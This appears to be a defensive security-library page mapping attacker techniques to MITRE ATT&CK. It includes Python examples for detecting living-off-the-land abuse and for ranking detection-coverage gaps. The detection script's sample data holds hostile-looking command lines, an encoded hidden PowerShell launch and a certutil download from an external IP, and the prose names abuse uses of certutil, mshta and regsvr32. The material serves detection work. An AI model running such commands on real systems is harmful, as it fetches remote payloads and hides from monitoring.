
Attack Techniques Library: Adversary Tactics, Techniques, and Procedures Documented

Defenders who understand how attacks actually work build better detection and response capabilities than those who focus only on defensive controls. CyberSanso’s Attack Techniques Library documents offensive techniques used by real threat actors – mapped to the MITRE ATT&CK framework, organized by attack phase, and annotated with detection opportunities, affected platforms, and real-world procedure examples from documented incident investigations.

This library supports threat modeling, purple team exercise design, red team operation planning, detection engineering, and security awareness training. Every technique entry links to associated threat actor profiles, relevant CVEs where technique exploitation is vulnerability-specific, and defensive controls from NIST CSF, CIS Controls, and MITRE D3FEND that address the technique.

The content here is deliberately adversary-focused rather than tool-focused. The goal is not a software product comparison but a technical understanding of how modern attackers move through environments – from initial access through data exfiltration – so defenders can build detection and response capabilities that address the techniques, not just the specific tools currently used to execute them. Tools change. Fundamental techniques persist.

Attack Phases: From Initial Access to Impact

Modern attacks rarely succeed in a single step. The cyber kill chain and MITRE ATT&CK matrix both describe attacks as multi-phase operations where each phase accomplishes a specific adversary goal. Understanding the full attack sequence helps defenders prioritize detection investment at the phases where early-stage detection provides the most disruption value.

Initial Access (TA0001): The techniques adversaries use to gain a foothold in your environment. The most common initial access techniques in 2025-2026 per the Verizon DBIR are: phishing (T1566) – crafting deceptive emails to steal credentials or deliver malware; exploiting public-facing applications (T1190) – targeting known CVEs in internet-exposed services like VPN appliances and edge devices; and valid accounts (T1078) – using stolen credentials from prior breaches, credential stuffing, or brute force. Vulnerability exploitation surpassed credential theft as the top initial access vector in the 2026 DBIR for the first time, now representing 31% of all breach entry points.

Execution (TA0002): How adversaries run their code after gaining access. Living-off-the-land binaries (LOLBins) and scripts are the dominant execution technique class in 2026: using legitimate system utilities like PowerShell, WMI, cmd.exe, certutil, and mshta to execute malicious payloads without dropping files that trigger traditional antivirus detection. The LOLBAS project catalogs these binaries. Malware-free intrusions accounted for 79% of CrowdStrike detections in 2024.

Persistence (TA0003): How adversaries maintain access across reboots and account changes. Common persistence techniques include scheduled tasks (T1053), registry run keys (T1547.001), web shells on internet-facing servers (T1505.003), and account manipulation (T1098). Nation-state actors often implant multiple persistence mechanisms to ensure continued access even if primary entry points are discovered and remediated.

Lateral Movement (TA0008): How adversaries move from their initial foothold to other systems. Pass-the-hash (T1550.002) and Pass-the-ticket (T1550.003) attacks use captured authentication material to move laterally without knowing plaintext passwords. Remote services exploitation (T1021) using RDP, WMI, or SMB is common in both criminal ransomware operations and nation-state espionage campaigns.

Privilege Escalation and Defense Evasion: The Hidden Middle Phases

Between gaining initial access and achieving their ultimate objective, adversaries focus on two capabilities that security teams often under-detect: escalating their privileges to gain administrative control, and evading the defenses they encounter along the way.

Privilege Escalation (TA0004) converts a foothold in a low-privilege user account into administrative or SYSTEM-level control. Common techniques include exploiting known local privilege escalation vulnerabilities (T1068) in the OS or installed software, abusing Windows token privileges (T1134), DLL hijacking (T1574.002), and process injection into higher-privileged processes (T1055). Active Directory-specific privilege escalation techniques – Kerberoasting (T1558.003), AS-REP roasting (T1558.004), and DCSync attacks (T1003.006) – are heavily used in ransomware operations and espionage campaigns alike because they target the authentication infrastructure that grants domain-wide access.

Defense Evasion (TA0005) is the most populated ATT&CK tactic with over 40 techniques. Key techniques include: indicator removal (T1070) – deleting logs and artifacts; masquerading (T1036) – naming malware to look like legitimate system processes; obfuscated files or information (T1027) – encoding or encrypting payloads to bypass static analysis; and disabling security tools (T1562) – terminating endpoint protection processes using legitimate admin tools. Detection of defense evasion activity often provides higher-confidence breach confirmation than initial access detection because evasion behaviors are abnormal even in environments with sophisticated adversaries.

Living Off the Land: Why Modern Attacks Are Hard to Detect

The dominant trend in attacker tradecraft since 2022 has been the shift toward “living off the land” (LotL) techniques: using legitimate operating system tools, scripting environments, and management frameworks to execute attack phases without introducing custom malware that endpoint security tools are designed to detect.

LOLBins (Living Off the Land Binaries) are legitimate Windows system binaries that can be abused for malicious purposes: certutil.exe for downloading payloads and decoding base64-encoded content; mshta.exe for executing HTA files hosting malicious scripts; regsvr32.exe for executing COM scriptlets from remote URLs; wmic.exe and powershell.exe for remote execution and reconnaissance. The LOLBAS project (lolbas-project.github.io) catalogs 200+ such binaries with documented abuse techniques. LOLBins are particularly challenging to detect because they are expected to run in any Windows environment – distinguishing legitimate administrative use from attacker abuse requires behavioral context rather than simple file-based blocklisting.

Fileless attacks represent the endpoint of this trend: attacks that never write a file to disk, operating entirely within process memory and legitimate system processes. CrowdStrike’s 2024 Global Threat Report found that malware-free intrusion techniques accounted for 79% of all detected attacks. Detecting fileless attacks requires behavioral analysis in the kernel and memory, capabilities available in modern EDR platforms but not in traditional antivirus solutions.

Detection strategies for LotL techniques rely on behavioral baselines: what is the normal pattern of PowerShell execution in your environment? What systems legitimately use certutil.exe? Anomalous execution chains – PowerShell spawning from Word, certutil downloading from external IPs, wmic executing on endpoints it does not normally manage – provide high-confidence behavioral indicators of attacker presence even without traditional IOC matches.
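The behavioral checks the paragraph above describes, as an added illustration rather than code from CyberSanso: three rules (Office application spawning a script host, certutil fetching from a non-internal address, wmic targeting a host outside an assumed per-workstation management baseline) run over constructed Sysmon-style process-creation events. Host names, the baseline, the 203.0.113.10 address and the command lines are all invented.

```python
import ipaddress
import re

# Constructed process-creation events: (host, parent image, image, command line).
EVENTS = [
    ("ws-042", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc <constructed>"),
    ("ws-042", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.txt"),
    ("adm-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
     "wmic /node:srv-fs-01 process list"),
    ("ws-017", r"C:\Windows\explorer.exe", r"C:\Windows\System32\wbem\WMIC.exe",
     "wmic /node:srv-db-02 os get caption"),
    ("ws-042", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -f http://10.20.1.5/cert.crt cert.crt"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
# Assumed baseline: which remote hosts each admin workstation legitimately manages via WMI.
WMI_BASELINE = {"adm-01": {"srv-fs-01", "srv-fs-02"}}
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                                              "192.168.0.0/16", "127.0.0.0/8")]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def external_ips(cmdline):
    """IPv4 literals in http(s) URLs that fall outside the internal ranges above."""
    ips = re.findall(r"https?://(\d{1,3}(?:\.\d{1,3}){3})", cmdline, re.I)
    return [ip for ip in ips if not any(ipaddress.ip_address(ip) in n for n in INTERNAL)]

def detect(events):
    """Return (host, rule, detail) tuples for events matching a behavioral rule."""
    alerts = []
    for host, parent_path, image_path, cmd in events:
        parent, image = basename(parent_path), basename(image_path)
        if parent in OFFICE and image in SHELLS:
            alerts.append((host, "office_spawned_shell", f"{parent} -> {image}"))
        if image == "certutil.exe" and "-urlcache" in cmd.lower():
            for ip in external_ips(cmd):
                alerts.append((host, "certutil_external_download", ip))
        if image == "wmic.exe":
            m = re.search(r'/node:"?([\w.-]+)', cmd, re.I)
            if m and m.group(1).lower() not in WMI_BASELINE.get(host, set()):
                alerts.append((host, "wmic_remote_off_baseline", m.group(1)))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Of the five constructed events, the on-baseline wmic call and the certutil fetch from an internal address produce no alert, which is the point of baselining: the binary alone is not the signal, the context is.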

Threat Modeling with ATT&CK: From Adversary Profile to Defensive Priority

Threat modeling maps your organization’s specific threat actor exposure to the ATT&CK techniques those actors use, allowing you to prioritize detection engineering toward the techniques most likely to appear in an attack against you.

The process has four steps:

Step 1 – Identify relevant threat actors: Which threat actor groups target your industry, your geography, and your organization’s type and size? CyberSanso’s Threat Actor Profiles page documents TTPs for nation-state groups, ransomware operations, and hacktivist collectives. For sector-specific guidance, the relevant ISAC (Information Sharing and Analysis Center) publishes threat actor briefings for its members.

Step 2 – Map actor TTPs to ATT&CK: For each relevant threat actor, identify which ATT&CK techniques they are documented to use. MITRE’s ATT&CK Groups database links each named group to their known techniques with procedure examples and source citations from public threat reports.

Step 3 – Assess your detection coverage: For each technique used by your relevant threat actors, evaluate whether your current security stack generates alerting or logging data that would detect that technique. The MITRE ATT&CK Navigator (attack.mitre.org/resources/navigator) is the standard tool for visualizing this coverage. Green cells are covered; white cells are detection gaps.

Step 4 – Prioritize detection engineering: Address detection gaps in the techniques used most frequently by your highest-priority threat actors. Detection rules, SIEM content, and EDR policies should be built to address the techniques your specific adversaries use rather than a generic threat landscape.
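The four steps carried through on constructed data, as an added example and not CyberSanso's tooling: actor-to-technique mappings and actor weights (Steps 1 and 2) are invented, the technique IDs are the ones named on this page, coverage values (Step 3) use an assumed none/partial/full scale, and the ranking function is Step 4. The Navigator layer emitted at the end uses only a small assumed subset of layer fields.

```python
import json

# Constructed inputs, not real threat intelligence: which actor uses which
# technique is illustrative; the technique IDs themselves come from the page.
ACTOR_TTPS = {
    "ransomware-affiliate-A": {"T1566", "T1190", "T1078", "T1053", "T1558.003", "T1550.002", "T1562"},
    "espionage-group-B": {"T1190", "T1505.003", "T1078", "T1003.006", "T1021", "T1070", "T1027"},
    "hacktivist-C": {"T1190", "T1098", "T1036"},
}
# Step 1 output: relative priority of each actor for this organization (assumed).
ACTOR_WEIGHT = {"ransomware-affiliate-A": 3, "espionage-group-B": 2, "hacktivist-C": 1}
# Step 3 output: current detection coverage per technique (assumed scale).
COVERAGE = {"T1566": "full", "T1190": "partial", "T1078": "partial", "T1053": "full",
            "T1558.003": "none", "T1550.002": "none", "T1562": "full", "T1505.003": "none",
            "T1003.006": "none", "T1021": "partial", "T1070": "partial", "T1027": "full",
            "T1098": "none", "T1036": "partial"}

def technique_scores(actor_ttps, weights):
    """Weighted count of prioritized actors documented to use each technique (Step 2)."""
    scores = {}
    for actor, ttps in actor_ttps.items():
        for t in ttps:
            scores[t] = scores.get(t, 0) + weights[actor]
    return scores

def prioritized_gaps(actor_ttps, weights, coverage):
    """Step 4: techniques not fully covered, highest adversary demand first."""
    scores = technique_scores(actor_ttps, weights)
    gaps = [(t, s, coverage.get(t, "none")) for t, s in scores.items()
            if coverage.get(t, "none") != "full"]
    # Highest score first, then uncovered before partially covered, then ID.
    return sorted(gaps, key=lambda g: (-g[1], g[2] != "none", g[0]))

def navigator_layer(actor_ttps, weights, coverage, name="coverage-vs-adversary-demand"):
    """Minimal Navigator layer dict (assumed field subset) colouring cells by coverage."""
    colour = {"none": "#ff6666", "partial": "#ffcc66", "full": "#66cc66"}
    techs = [{"techniqueID": t, "score": s, "color": colour[coverage.get(t, "none")],
              "comment": f"coverage={coverage.get(t, 'none')}"}
             for t, s in sorted(technique_scores(actor_ttps, weights).items())]
    return {"name": name, "domain": "enterprise-attack", "techniques": techs}

if __name__ == "__main__":
    for t, score, cov in prioritized_gaps(ACTOR_TTPS, ACTOR_WEIGHT, COVERAGE):
        print(f"{t:<10} demand={score} coverage={cov}")
    print(json.dumps(navigator_layer(ACTOR_TTPS, ACTOR_WEIGHT, COVERAGE), indent=1))
```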
